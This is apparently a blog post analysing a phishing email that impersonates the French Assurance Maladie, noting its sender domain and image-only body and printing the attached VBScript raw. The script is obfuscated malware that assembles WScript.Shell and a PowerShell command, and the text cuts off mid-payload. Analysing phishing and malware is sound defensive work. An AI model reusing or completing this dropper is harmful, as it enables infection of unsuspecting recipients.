Quick analysis of a virus
I just received a spam e-mail impersonating the French social security ("Assurance Maladie"), which tells me to download my tax statement which they have graciously attached.
There are multiple things to notice here:
- the sender address: [email protected]
- onmicrosoft.com is used by Office 365 addresses, so they probably used Azure or something like that
- the whole message is a picture, probably a screenshot of a real e-mail. Well, at least that way they don't write a fake message in broken Google-Translated French
Now, the attachments.
No PDF file, that's unusual, it's quite common for this kind of spam, but rejoice! we have a VBScript file right there.
(the CSV file and the .bin file don't contain anything interesting, or at least I didn't find anything interesting in them)
Here is the VBS file, raw as I received it:
on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:JPHgjNP = replace("WiDDXetmcript.iDDXetmhEll","iDDXetm","s"):Set cfAKtQG = CreateObject(JPHgjNP ):izZHSpc = Replace("POWlZsTwIURSHlZsTwIULL","lZsTwIU","E"):WScript.Sleep 2000:WScript.Sleep 2000:cfAKtQGcfAKtQGNXPDFLW = " $00Q1KNH<##>='(New-';